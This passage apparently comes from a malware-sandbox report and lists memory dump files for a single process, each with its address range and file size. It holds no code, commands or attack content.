                                                                                                              • memory/4156-35-0x000001FE63250000-0x000001FE632A8000-memory.dmp
                                                                                                                Filesize

                                                                                                                352KB

                                                                                                              • memory/4156-33-0x000001FE63160000-0x000001FE63212000-memory.dmp
                                                                                                                Filesize

                                                                                                                712KB

                                                                                                              • memory/4156-32-0x000001FE62530000-0x000001FE6315C000-memory.dmp
                                                                                                                Filesize

                                                                                                                12.2MB

                                                                                                              • memory/4156-12-0x00007FF9F8710000-0x00007FF9F91D1000-memory.dmp
                                                                                                                Filesize

                                                                                                                10.8MB

                                                                                                              • memory/4156-1-0x000001FE7DE30000-0x000001FE7DE52000-memory.dmp
                                                                                                                Filesize

                                                                                                                136KB

                                                                                                              • memory/4156-31-0x000001FE30830000-0x000001FE3086E000-memory.dmp
                                                                                                                Filesize

                                                                                                                248KB

                                                                                                              • memory/4156-30-0x000001FE30810000-0x000001FE30816000-memory.dmp
                                                                                                                Filesize

                                                                                                                24KB

                                                                                                              • memory/4156-29-0x000001FE7DC60000-0x000001FE7DC68000-memory.dmp
                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/4156-28-0x000001FE30800000-0x000001FE30806000-memory.dmp
                                                                                                                Filesize

                                                                                                                24KB

                                                                                                              • memory/4156-26-0x000001FE62420000-0x000001FE6247E000-memory.dmp
                                                                                                                Filesize

                                                                                                                376KB

                                                                                                              • memory/4156-27-0x000001FE62480000-0x000001FE624D8000-memory.dmp
                                                                                                                Filesize

                                                                                                                352KB

                                                                                                              • memory/4156-25-0x000001FE30820000-0x000001FE30826000-memory.dmp
                                                                                                                Filesize

                                                                                                                24KB